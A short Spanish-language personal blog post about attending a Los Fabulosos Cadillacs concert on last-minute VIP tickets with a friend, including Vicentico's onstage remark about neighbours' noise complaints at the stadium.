Inesperadamente, unas horas antes del recital cayeron a mis manos 2 entradas para el VIP del recital!! y hacia alli partimos con el amigo Cinic.


El recital estuvo verdaderamente excelente!! no recuerdo la ultima vez que vi a Los Cadillacs en vivo, pero puedo decir que no han perdido su magia :-)

El siguiente es uno de los momentos interesantes del recital, en donde Vicentico hace referencia a un problema que hay con los vecinos de la zona que siempre se quejan por los ruidos molestos que generan los recitales que se hacen en ese estadio.


Excelente haber terminado el fin de semana largo de esta forma ;-)

LinkWithin